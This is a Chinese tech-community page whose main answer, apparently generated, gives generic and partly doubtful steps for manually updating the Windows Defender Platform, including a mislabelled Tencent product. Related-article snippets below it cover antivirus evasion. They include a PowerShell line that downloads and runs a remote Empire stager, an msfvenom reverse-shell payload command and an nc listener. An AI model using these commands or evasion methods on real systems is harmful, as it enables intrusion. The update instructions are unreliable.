首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

手动将Windows Defender Platform版本从4.12.x更新到4.18.x

Windows Defender是微软公司开发的一款杀毒软件,用于保护Windows操作系统免受恶意软件和病毒的侵害。Windows Defender Platform是Windows Defender的核心组件之一,负责提供实时保护、病毒扫描和恶意软件检测等功能。

将Windows Defender Platform版本从4.12.x更新到4.18.x可以通过以下步骤完成:

  1. 打开Windows Defender:在Windows操作系统中,可以通过在任务栏搜索框中输入"Windows Defender"来打开Windows Defender安全中心。
  2. 检查当前版本:在Windows Defender安全中心界面中,点击左侧菜单栏中的"关于"选项,可以查看当前安装的Windows Defender版本号。确认当前版本为4.12.x。
  3. 下载最新版本:访问微软官方网站(https://www.microsoft.com/windows/comprehensive-security)或Windows Defender安全中心界面中的更新选项,下载最新的Windows Defender Platform版本4.18.x的安装程序。
  4. 安装更新:双击下载的安装程序,按照提示完成安装过程。在安装过程中,可能需要重启计算机以完成更新。
  5. 检查更新结果:安装完成后,重新打开Windows Defender安全中心,点击"关于"选项,确认Windows Defender Platform版本已成功更新到4.18.x。

更新Windows Defender Platform版本的优势包括:

  1. 安全性提升:新版本通常修复了之前版本中的漏洞和安全问题,提供更强大的防护能力,保护计算机免受最新的威胁。
  2. 功能增强:新版本可能会引入新的功能和改进,提升用户体验和操作效率。
  3. 兼容性改进:更新到最新版本可以提高与其他软件和系统的兼容性,减少可能出现的冲突和错误。

Windows Defender Platform的应用场景包括:

  1. 个人电脑保护:Windows Defender是Windows操作系统的默认杀毒软件,适用于个人用户保护自己的电脑免受病毒和恶意软件的侵害。
  2. 企业网络安全:Windows Defender可以集成到企业的网络安全架构中,提供实时保护和威胁检测,帮助企业防范网络攻击和数据泄露。
  3. 公共场所终端保护:Windows Defender可以应用于公共场所的计算机终端,如图书馆、网吧等,保护用户的隐私和数据安全。

腾讯云提供了一系列与云安全相关的产品,可以与Windows Defender Platform配合使用,增强云计算环境的安全性。具体推荐的产品包括:

  1. 云服务器(CVM):提供安全可靠的云服务器实例,用户可以在上面部署Windows Defender Platform,并通过腾讯云的安全组、防火墙等功能进行网络安全管理。
  2. 云安全中心(SSC):提供全面的云安全管理和威胁检测服务,帮助用户实时监控和应对云环境中的安全威胁。
  3. 云堡垒机(CWP):提供服务器安全管理和运维审计功能,帮助用户加固服务器安全、防范恶意攻击。

以上是关于手动将Windows Defender Platform版本从4.12.x更新到4.18.x的完善且全面的答案。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

关闭反恶意软件保护(第 1 部分)-Windows Defender 防病毒

因此,在大多数情况下,在防病毒代理的上下文中执行代码绕过挂钩。 我首先从 Windows Defender 开始,它在技术上是最简单的。...在对如何 Windows Defender 中删除 PPL 保护进行了太多研究之后,它几乎就在我的眼前,但我没有看到。...一旦 Windows Defender 启动它就会查询  C:\ProgramData\Microsoft\Windows Defender\Platform 用于文件夹,根据字符串版本确定工作目录,...立即从以前的版本字符串加载 image.png 老实说,这非常适合防病毒软件,如果我是微软,我肯定会考虑解决这个问题。...Windows 不会蓝屏,继续正常运行,因此我们将被允许在 %ProgramData%\Microsoft\Windows Defender\Platform中删除任意二进制文件 综上所述,可以采取以下步骤在

2.5K20

五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)

同时,希望您能与我一起操作和进步,后续深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!...一种方式是手动恢复,另一种是设置白名单,比如将上述文件夹“malware”设置为白名单,复制样本后再进行后续实验。 第一步,开启MS Defender防病毒扫描选项。...* Win2K: Windows 2000 platform * Win32: Windows 32-bit platform * Win64: Windows 64-bit platform * Win95...: Windows 95, 98 and ME platforms * Win98: Windows 98 platform only * WinCE: Windows CE platform * WinNT...或者,如何这些家族名称对齐呢?尤其是Virusshare和Virustotal对每个样本有多重标注结果。 首先,我能想到的是做一个投票器,来准确的标注信息。

31310
  • 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)

    同时,希望您能与我一起操作和进步,后续深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不易,大神们不喜勿喷,谢谢!...恶意软件通常具有自动执行的特点,即无需用户手动启动,就可以进行各种恶意活动。根据行为特性和目的,恶意软件可分为多种类型,包括病毒、蠕虫、木马、间谍软件、勒索软件等。...* Win2K: Windows 2000 platform * Win32: Windows 32-bit platform * Win64: Windows 64-bit platform * Win95...: Windows 95, 98 and ME platforms * Win98: Windows 98 platform only * WinCE: Windows CE platform * WinNT...或者,如何这些家族名称对齐呢?尤其是Virusshare和Virustotal对每个样本有多重标注结果。 首先,我能想到的是做一个投票器,来准确的标注信息。

    34310

    win10必须停止更新,存在重大问题

    有些小伙伴会说,很简单啊,删除KB4512941补丁就好了,倒也没错,不过这可是个大累计补丁,涉及到不少大家常用的功能,比如Windows Defender防病毒软件、某些游戏的音频问题、VB运行问题,...数值0变为1,或者直接删掉这个键值。...我应该是8月份升级的系统,也就是这个1903版,看到这个问题之后就立马看了一下我的下一个系统升级版本,我靠,就是这个KB4512941版本,我赶紧把更新关掉,我更新到这个版本就发现了好多问题,虚拟机不能用了...4,如果你想重新更新系统也没有关系,一样的方法,弹出来的窗口选 是 就好了 说明: 1、可以防止任何版本Windows 自动更新(无论是 Windows 10 还是 Windows 7,无论家庭版还是专业版...5、不会影响您手动更新 Windows(在控制面板或设置中心里点击“检查更新”)

    1.4K20

    关闭 Windows Defender 工具

    Vista开始,Windows Defender包含在Windows中。这是一小块软件,可在后台运行,以帮助保护您的计算机免受病毒,间谍软件和其他恶意软件(恶意软件)的侵害。潜在有害的软件。...Windows Vista及更高版本中所有Defender版本的问题在于,它已集成到操作系统中,并且默认情况下进行安装,没有可见或隐藏的选项可供卸载。...许多人正在寻找禁用或系统中删除它的方法,因为他们倾向于使用其他软件,例如,在Windows 8和10上,您无法再完全关闭Windows Defender了,单击Windows Defender中的“设置...[已修复] – Defender Control在Windows 10 1903上不起作用 为什么要使用它: 1.在大数据PC复制到USB或USB复制到USB的过程中,禁用防御程序可以减少总复制时间...3.一些防病毒程序会要求用户手动关闭或禁用Windows DefenderWindows 10中… 4.如果启用了该功能,则每次启动PC时Windows Defender都有机会启动。

    3.9K21

    远程桌面服务到获取Empire Shell

    另外,还有 Windows Defender 也是我们必须要面对和解决的问题。 环境要求: RDS服务器放行80端口出站流量。...简单的方法 直到后来我才发现,其实完全可以省去最后两步的操作。只需使用set Base64 false和set Outfile shell生成一个Empire stager即可。...IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.18/shell'); 如果你够幸运Defender将不会拦截,并且你获取到一个...获取 meterpreter shell 生成一个dll payload: msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp...出于某种原因,Windows Defender并没有拦截我的payload。可能是因为payload的x64签名尚未被Defender识别为恶意软件,具体我也不是很清楚。

    1.9K40

    绕过基于签名的 AV

    在此博客中,我们通过修改 Mimikatz 源代码来规避基于签名的检测来规避 Windows Defender。...既然我们知道什么是基于签名的检测,那么我们如何确定哪些特定签名导致 Windows Defender 将我们的有效负载识别为恶意?...您需要更改默认的 Platform Toolset 选项。在撰写本文时,我将我的设置为“Visual Studio 2019 (v142)”。对 mimilib 解决方案也重复此过程。...请注意,这是一个超级笨拙的黑客攻击,在尝试远程计算机转储时可能会导致问题。 编译源代码后,我使用 DefenderCheck 来查看二进制文件是否被检测为恶意。...跳动检测 - 第 3 级:函数名称 让二进制文件与最新版本Defender 一起工作需要许多其他更改。

    1.5K40

    Defeat-Defender 免杀批处理脚本

    获得管理员权限后,它将禁用防御者 PUA保护 自动送样 Windows防火墙 Windows智能屏幕(永久) 禁用快速扫描 exe文件添加到防御者设置中的排除项 禁用勒索软件保护 病毒总结果[8/04...绕过Windows Defender技术: 最近,Windows引入了称为“防篡改”的新功能。...该功能可防止禁用实时保护并使用Powershell或cmd修改防御者注册表项...如果需要禁用实时保护,则需要手动执行...。...但是我们将使用NSudo禁用实时保护,而不会触发Windows Defender 运行Defeat-Defender脚本后 ? ?...执行Batch文件时要求管理员权限、获得管理员特权后,它开始禁用Windows Defender实时保护,防火墙,智能屏幕并开始服务器下载我们的后门,并将它放置在启动文件夹中。

    1.5K50

    使用wsb-detect检测你是否在Windows沙盒中

    众所周知,Windows Defender会使用沙盒来进行动态分析,而且很多安全分析都是需要在沙盒中手动执行的。在2019年底,微软推出了名为Windows Sandbox(简称WSB)的新功能。...该沙盒也是Microsoft Defender Application Guard(WDAG)的基础,用于在支持Hyper-V的主机上进行动态分析,并且可以在任何Windows 10专业版或企业版计算机上启用...wsb_detect_username 此方法检查当前用户名是否为WDAGUtilityUserAccount,即沙盒中默认使用的帐户。...wsb_detect_office 检查当前根驱动器中的OfficePackagesForWDAG,该驱动器似乎用于Windows Defender Microsoft Office模拟。...wsb_detect_genuine 当涉及到沙盒检测时,这是一种通用的方法,但是测试来看,Windows在虚拟机中似乎没有被验证为合法的。

    1.5K20

    通过Windows事件日志介绍APT-Hunter

    该工具将用于加快Windows日志分析的速度,但永远不会取代深度日志分析。 收集日志:用户可以手动收集CSV和EVTX格式的日志,也可以使用本文后面讨论的powershell脚本自动提取所需的日志。...支持Windows事件日志导出为EVTX和CSV。 分析师可以新的恶意可执行文件名称直接添加到list中。 提供输出为excel表,每个Log作为工作表。 此版本只是开始,更多用例即将出现。...Defender使用Windows Defender日志对恶意软件采取了措施 检测Windows Defender无法使用Windows Defender日志对恶意软件采取措施 使用Windows Defender...日志检测Windows Defender发现的恶意软件 使用Windows Defender日志检测Windows Defender删除的恶意软件历史记录 检测Windows Defender检测到可疑行为使用...Windows Defender日志的恶意软件 使用Windows Defender日志检测禁用的Windows Defender实时保护 使用Windows Defender日志检测Windows Defender

    1.5K20

    Nim之NimShellCodeLoader免杀学习

    环境准备 测试机1:Windows 10 Windows Defender最新版 测试机2:Windows Server2019 、Windows Defender最新版、火绒联网最新版 攻击机:Mac.../20181212/216.html 解压之后的文件放入到C盘根目录下: 然后来到bin目录下,使用命令行检查当前的gcc版本: gcc.exe --version 然后就是和上面一样,设置系统环境变量...Defender静态杀毒 当前有Windows Defender最新版: 此时的Windows Defender显示安全无毒; 3.2 火绒静态杀毒 4....以下链接下载源代码版本: https://github.com/aeverj/NimShellCodeLoader/releases/tag/0.3 下载之后解压之后放到win10上,进入encryption...其他免杀方法 由于篇幅问题,我在这里后续的所有方法都进行了整理,分别生成了凯撒加密和3des加密之后的文件,并且直接使用Windows Defender进行扫描杀毒,如果有免杀Windows Defender

    1.4K40

    微软发布Windows Defender System Guard运行时认证技术

    Windows 10 Fall Creators 更新中,微软工作人员所有系统完整性功能重新组织到 Windows Defender System Guard 中。...内置于核心 Windows 操作系统中的Windows Defender System Guard运行时认证逐步适用于 Windows 的所有版本。 ?...例如,应用程序可以要求 Windows Defender System Guard 硬件支持的区域测量系统的安全性并返回报告。...在这种情况下,Windows Defender System Guard 运行时认证无法确保效果,并且可以充当非锁定 Windows 版本上其他安全产品的信号; B....Windows Defender System Guard 运行时认证技术致力于不断提升整个 Windows 10 安全堆栈的防御能力,从而让攻击者更改系统、影响安全状态的行为容易检测。

    1.5K20

    艰难的mimikatz源码编译免杀 Windows Defender

    3.Windows Defender免杀更不用想,秒杀! 2.2 其他方法成功 免杀火绒成功 免杀Windows Defender(关闭自动上传可疑样本)成功 360不进行测试,联网无意义!...(联网版,会自动上传样本)> 360安全卫士(不上传样本) >= 360杀毒 (不上传样本) 以上仅仅针对本文接下来的操作而已,其实实战中,火绒在一定程度上容易过。...4. mimikatz源码编译 https://github.com/gentilkiwi/mimikatz直接源代码下载下来: 文件解压之后,使用vs2012打开: 打开之后,可以看到当前存在报错信息...5. mimikatz正常编译免杀效果 当前编译之后的mimikatz在火绒和360、windows Defender环境下测试: 5.1 360 360右键联网查杀的时候,当即没有查出来,但是直接样本进行上传...5.3 360杀毒 5.4 windows Defender 在这里压根不用测试windows Defender,会被杀的更快: 因为本文使用的方法无法bypass windows Defender

    2.2K40

    rpc服务器不可用 dcom 无法使用任何配置的协议与计算机,如何修复Windows上的“RPC服务器不可用”错误?…

    为了检查Windows Defender防火墙是否存在任何问题,[2]请按照下列步骤操作: 打开“开始”,然后在搜索框中键入防火墙。 结果中打开Windows Defender防火墙。...在Windows Defender防火墙中,单击左窗格中的“通过Windows Defender防火墙允许应用程序或功能”选项。 在允许的应用和功能列表中,找到远程协助并确保允许它。...菜单中选择“属性”。 检查是否启用了Microsoft网络和Internet协议版本6(TCP / IPv6)选项的文件和打印机共享。如果没有,请勾选复选框。...如果网络连接有任何问题,可能会出现严重的问题,但不必担心,因为它们也可以解决。我们的团队提供了五种方法,可以帮助修复Windows上的0x8024401c错误。...等到Windows找到并安装更新。但是,如果操作系统未找到任何更新,您可以在官方制造商的网站上进行检查并手动安装。

    9.2K30

    永久关闭Windows Defender实时保护

    简介 Windows Defender ,现名 Microsoft Defender,曾用名 Microsoft Anti Spyware ,是一个杀毒程序,可以运行在 Windows XP 和 Windows...它的测试版于2005年1月6日发布,在2005年6月23日、2006年2月17日微软又发布了更新的测试版本Windows Defender的定义库更新很频繁。... Windows 10 开始, Windows Defender 加入了右键扫描和离线杀毒,根据最新的每日样本测试,查杀率已经有了大的提升,达到国际一流水准。...2019年3月,微软 Windows Defender Advanced Threat Protection 更名为 Microsoft Defender ATP ,随后微软 ATP 引入 Mac。...2020年4月,在 Windows 10 2020年5月更新中(2004),微软更新了 Windows 安全中心应用,将其中的 Windows Defender 更改为 Microsoft Defender

    88520

    神兵利器 - APT-Hunter 威胁猎人日志分析工具

    这个工具将用于加速windows日志分析,但永远不会取代深度日志分析。 收集日志:用户可以手动收集CSV和EVTX格式的日志,或者使用本文后面讨论的powershell脚本来自动提取所需的日志。...: Project1_Report.xlsx:此excel工作表包括提供给APT-Hunter的每个Windows日志中检测到的所有事件 Project1_TimeSketch.csv:您可以将此CSV...Defender使用Windows Defender日志对恶意软件采取了措施 检测Windows Defender无法使用Windows Defender日志对恶意软件采取措施 使用Windows Defender...日志检测Windows Defender发现的恶意软件 使用Windows Defender日志检测Windows Defender删除的恶意软件历史记录 检测Windows Defender检测到可疑行为使用...Windows Defender日志的恶意软件 使用Windows Defender日志检测禁用的Windows Defender实时保护 使用Windows Defender日志检测Windows Defender

    1.8K10

    Nim之套接字免杀学习

    的; 参考链接:https://www.bilibili.com/video/BV1Yr4y1Y7qP/ 在这里我环境配置到文件打包,做一个整理。...环境准备 测试机1:Windows 10 Windows Defender最新版 测试机2:Windows Server2019 、Windows Defender最新版、火绒联网最新版 攻击机:Kali...Linux 在以下测试中,均关闭Windows Defender最新版的自动上传样本功能。.../216.html 解压之后的文件放入到C盘根目录下: 然后来到bin目录下,使用命令行检查当前的gcc版本: gcc.exe --version 然后就是和上面一样,设置系统环境变量: 在控制面板...5.3 上线测试 首先在kali攻击机上开启监听: nc -lvp 55 然后在Windows的cmd命令行中执行木马: 等待一下之后,反弹成功: 5.4 免杀测试 Windows Defender

    93840
    领券